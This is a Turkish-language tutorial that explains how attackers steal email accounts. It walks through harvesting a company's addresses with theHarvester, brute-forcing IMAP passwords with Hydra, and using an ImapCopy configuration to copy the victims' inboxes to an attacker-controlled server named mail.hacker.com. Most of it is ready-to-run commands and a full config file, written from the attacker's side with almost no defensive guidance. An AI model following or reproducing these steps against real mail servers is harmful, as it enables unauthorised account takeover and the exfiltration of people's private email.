Saniyeler İçerisinde emailleriniz nasıl çalınır?
Bu yazımda sizlerle hackerların nasıl email hesap şifrelerini kırdıklarından ve içerisindeki mailleri siz fark etmeden nasıl saniyeler içinde istedikleri bir adrese aktarabildiklerinden bahsedeceğim. Konunun anlaşılabilir olması açısından öncelikle yüzeysel bilgi verip tools isimlerinden bahsedeceğim, sonrasında örnek bir senaryoyu canlandıracağım.
Email adreslerinin şifresinin çalınması ve emaillerinin yedeklenmesi işlemi 2 adımdan oluşmakta,
1-Email adresi şifresinin kırılması
2-Emaillerin kopyalanması.
1- Email şifresini kırmak
Bu işlem için genellikle brute force ataklar kullanılır, basit şifre kullanan email adresi dakikalar içerisinde ele geçirilebilir ve bunlar olurken email adres sahibi kesinlikle bunlardan haberdar olmaz.
Ancak dikkatli bir sistem mühendisi bu durumu fark edebilir ve önlem almayı deneyebilir.
Brute force için kullanılan bazı toolslar : Hydra, Medusa, Ncrack.
Ben bu makale de brute force tools olarak hyrda kullanacağım.
2-Emaillerin kopyalanması
Bu işlem için genellikle imap sync işlemi yapan toolslar kullanılır, internet bağlantısı, kullanılan mail sunucuların internet bağlantısı ve servis yoğunluğuna bağlı olarak mailler saniyeler içerisinde farklı bir email adresinin inbox folderına kopyalanabilir. Bu işlem esnasında son kullanıcı ve sistem yöneticilerinin olayı fark edebilmeleri neredeyse imkânsızdır.
Bu işlem için ben ubuntu debian gibi işletim sistemlerindeki imapcopy tools kullanıyorum, farklı seçenekler de mevcut internette imap copy, imap sync şeklinde aramalar ile bu toollara erişebilirsiniz.
3- Uygulamalı Örnek
a) Toolsların hazırlanması
Kullanacak olduğumuz iki tools var,
* Hydra (Brute Force için)
* ImapCopy (Emailleri farklı bir adresin inbox folderına taşımak için)
Backtrack kullanıcıları için hydra default olarak kurulu geliyor, ubuntu, debian v.b. Işletim sistemlerinde
apt-get install hydra
Şeklinde uygulamayı kurabilirsiniz.
Kurulum tamamlandıktan sonra komut satırında hydra yazarak hydra programı ile ilgili ek parametrelere erişebilirsiniz, hydra pop3 imap gibi mail servisleri dışında rdp, ssh v.b. Gibi servisler için de brute force yapabilmektedir.
a) Hydra
Tek bir email adresini hedef alan saldırı;
hydra -l user@xxx.com -P Passwordlist.txt mail.xxx.com imap
Kurumlara gerçekleştirilern saldırlarda Theharvester gibi toolslar ile alan adına ait mailler search edilir,
./theHarvester.py -d xxx.com -l 500 -b Google
Theharvester ile ilgili detaylı bilgiye için http://www.securistan.com/theharvester-kullanimi/ adresini ziyaret edebilirsiniz.
Theharvester ile elde etmiş olduğunuz email adreslerini email.txt adı ile bir txt e yazın ve aşağıdaki hydra komutunu kullanın,
hydra -L email.txt -P Passwordlist.txt mail.xxx.com imap
Passwordlist.txt içerisinde password listiniz olmalıdır.
Bu adımda user1@xxx.com ve user2@xxx.com email adresi şifresi elde ettiğimizi düşünerek ikinci bölüme geçiyorum.
b) ImapCopy
Imapcopy uygulamasını ubuntu debian gibi linux sürümlerinde,
apt-get install imapcopy
komutu ile kurabilirsiniz.
Kurulumun tamamlandıktan sonra
cd /usr/share/doc/imapcopy/examples/
komutu ile /usr/share/doc/imapcopy/examples/ dizinine gidiyoruz, Bu dizinde ImapCopy.cfg adın da bir text doküman mevcut, bunu editlememiz gerekecek, editlenecek alanlar,
SourceServer : Saldırılan alan adı mail sunucunun ip adresi
DestServer : Emaillerin kopyalancağı sunucu
Copy : User ve şifre bilgileri
Bu bölümler deki değişikliği yapyıktan sonra komut satırında,
İmapcopy
komutunu çalıştırıyoruz ve mailleri kendi email adresimize almaya başlıyoruz.
SourceServer : mail.xxx.com
DestServer : mail.hacker.com
Copy : “user1@xxx.com” “123456” “hacker@hacker.com” “!’^+.RQ5%+”
# Email adres Email Password Hacker email Hacker Password
NOT : Yukaırdaki email adres, email password, hacker email, hacker password alanları açıklamadır.
Bu işlemin ardından hacker@hacker.com adresine baktığınızda user1@xxx.com ve user2@xxx.com a ait mailleri görebilirsiniz.
ImapCopy.cfg dosyası sadece inbox klasörünü taşıyacak şekilde configure edilmiştir, diğer folderlar için ImapCopy.cfg dosyasında değişiklik yapmanız gerekir.
Örnek ImapCopy.cfg dosya içeriği aşağıdaki gibidir.
##############
# Sourceserver
##############
SourceServer mail.xxx.com
SourcePort 143
###################
# Destinationserver
###################
DestServer mail.hacker.com
DestPort 143
# DebugSrc and DebugDest will show all traffic between IMAPCopy and Server
#
#DebugSrc
#DebugDst
#skipfolder INBOX.Trash
#skipfolder INBOX.Sent
#skipfolder “INBOX.Sent Objects”
copyfolder INBOX
#copyfolder “INBOX.My personal files”
#copyfolder INBOX.Net-Connection.dy
#copyfolder INBOX.test
#DstRootFolder “Your old Mails”
#AllowFlags “\Seen\Answered\Flagged\Deleted\Draft Junk NonJunk $MDNSent $Forwared”
DenyFlags “\Recent”
converttimezone “UTC” “+0000”
converttimezone “UT” “+0000”
#############################
# List of users and passwords
#############################
# SourceUser SourcePassword DestinationUser DestinationPassword
Copy “user1@xxx.com” “123456” “hacker@hacker.com” “!’^+.RQ5%+”
Copy “user2@xxx.com” “istanbul” “hacker@hacker.com” “!’^+.RQ5%+”
Makalemin sonuna geldim. Umarım faydalı bir makale olmuştur. Bir sonraki makalemde görüşmek üzere.